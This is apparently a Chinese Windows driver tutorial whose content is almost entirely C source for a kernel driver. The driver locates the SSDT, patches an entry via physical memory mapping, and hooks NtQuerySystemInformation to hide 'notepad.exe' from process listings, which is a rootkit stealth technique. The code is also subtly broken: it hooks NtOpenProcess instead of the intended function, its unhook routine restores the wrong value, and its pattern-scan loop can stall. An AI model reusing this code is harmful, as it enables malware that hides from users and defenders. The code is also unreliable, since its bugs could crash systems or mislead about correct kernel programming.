windows驱动开发31.隐藏进程,通过Hook SSDT表中的NtQuerySystemInformation函数隐藏进程信息

隐藏进程,通过Hook SSDT表中的NtQuerySystemInformation函数隐藏进程信息

#include <ntifs.h>
#include "C:\D\test\CC++\cc++lib\driver\def.h"

VOID GetSSDT0(PVOID* addr);
BOOLEAN HookSSDT_On(PVOID newfunc, PVOID hkfunc, PVOID* oldbase, PULONG oldoffset);
VOID HookSSDT_Off(PVOID oldbase, ULONG oldoffset);
NTSTATUS NTAPI MyNtQuerySystemInformation(
	SYSTEM_INFORMATION_CLASS SystemInformationClass,
	PVOID SystemInformation,
	ULONG SystemInformationLength,
	PULONG ReturnLength
);
VOID TestHideProcess();

NTSTATUS DriverUnload(PDRIVER_OBJECT pdriver)
{
	DbgPrint("unload...\n");
	return STATUS_SUCCESS;
}
static PDRIVER_OBJECT g_pdriver = NULL;
NTSTATUS DriverEntry(PDRIVER_OBJECT pdriver, PUNICODE_STRING path)
{
	pdriver->DriverUnload = DriverUnload;
	DbgPrint("loading...\n");
	g_pdriver = pdriver;
	TestHideProcess();;
	return STATUS_SUCCESS;
}
VOID GetSSDT0(PVOID* addr)
{
	PLDR_DATA_TABLE_ENTRY entry = (PLDR_DATA_TABLE_ENTRY)g_pdriver->DriverSection;
	PLDR_DATA_TABLE_ENTRY head = entry;
	UNICODE_STRING temp = { 0 };
	RtlInitUnicodeString(&temp, L"ntoskrnl.exe");
	PCHAR start = NULL;
	ULONG size = 0;
	do
	{
		if (RtlCompareUnicodeString(&temp, &entry->BaseDllName, TRUE) == 0)
		{
			DbgPrint("wZ\n", &entry->BaseDllName);
			start = (PCHAR)entry->DllBase;
			size = entry->SizeOfImage;
			break;
		}
		entry = entry->InLoadOrderLinks.Flink;
	} while (entry != head);
	//4c8d15
	//4c8d1d
	for (size_t i = 0; i < size; i++)
	{
		if (MmIsAddressValid(start))
		{
			if (*start == (CHAR)0x4c && *(start + 1) == (CHAR)0x8d && *(start + 2) == (CHAR)0x15)
			{
				start += 7;
				if (MmIsAddressValid(start))
				{
					if (*start == (CHAR)0x4c && *(start + 1) == (CHAR)0x8d && *(start + 2) == (CHAR)0x1d)
					{
						start += 7;
						if (MmIsAddressValid(start))
						{
							*addr = (ULONG64)start + *(PULONG)(start - 4);
							return;
						}
					}
				}
				start++;
			}
		}
	}
}

BOOLEAN HookSSDT_On(PVOID newfunc, PVOID hkfunc, PVOID* oldbase, PULONG oldoffset)
{
	PVOID ssdt = NULL;
	GetSSDT0(&ssdt);
	if (!ssdt)return;
	ULONG index = *(PULONG)((ULONG64)ssdt + 0x10);
	ULONG offset = 0;
	PVOID pfunc = NULL;
	for (size_t i = 0; i < index; i++)
	{
		offset = ((PULONG) * (PULONG64)ssdt)[i];
		(ULONG64)pfunc = *(PULONG64)ssdt + (offset >> 4);
		if (hkfunc == pfunc)
		{
			*oldbase = *(PULONG64)ssdt + sizeof(ULONG) + 1;
			*oldoffset = offset;
			offset = (ULONG64)newfunc - *(PULONG64)ssdt;
			PHYSICAL_ADDRESS physical = MmGetPhysicalAddress(*oldbase);
			PVOID map = MmMapIoSpace(physical, 0x10, MmCached);
			*(PULONG)map = offset << 4;
			DebugMessage("挂钩完成\n");
			MmUnmapIoSpace(map, 0x10);
			return TRUE;
		}
	}
	return FALSE;
}
VOID HookSSDT_Off(PVOID oldbase, ULONG oldoffset)
{
	PHYSICAL_ADDRESS physical = MmGetPhysicalAddress(oldbase);
	PVOID map = MmMapIoSpace(physical, 0x10, MmCached);
	*(PULONG)map = oldbase;
	DebugMessage("卸载完成\n");
	MmUnmapIoSpace(map, 0x10);
}

NTSTATUS NTAPI MyNtQuerySystemInformation(
	SYSTEM_INFORMATION_CLASS SystemInformationClass,
	PVOID SystemInformation,
	ULONG SystemInformationLength,
	PULONG ReturnLength
) {
	NTSTATUS status = NtQuerySystemInformation(
		SystemInformationClass,
		SystemInformation,
		SystemInformationLength,
		ReturnLength
	);

	if (!NT_SUCCESS(status) || SystemInformationClass != SystemProcessInformation)
		return status;

	// 修改返回的数据，隐藏进程或其他操作
	PSYSTEM_PROCESS_INFORMATION pCurrent = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
	PSYSTEM_PROCESS_INFORMATION pPrev = NULL;

	while (pCurrent) {
		if (wcsstr(pCurrent->ImageName.Buffer, L"notepad.exe")) {
			if (pPrev) {
				if (pCurrent->NextEntryOffset)
					pPrev->NextEntryOffset += pCurrent->NextEntryOffset;
				else
					pPrev->NextEntryOffset = 0;
			}
			else {
				if (pCurrent->NextEntryOffset)
					(PUCHAR)SystemInformation += pCurrent->NextEntryOffset;
				else
					SystemInformation = NULL;
			}
		}
		else {
			pPrev = pCurrent;
		}

		if (pCurrent->NextEntryOffset == 0) break;
		pCurrent = (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)pCurrent + pCurrent->NextEntryOffset);
	}

	return status;
}
PVOID hkbase = NULL;
ULONG hkoffset = 0;

VOID TestHideProcess()
{
	HookSSDT_On(MyNtQuerySystemInformation, NtOpenProcess, &hkbase, &hkoffset);
}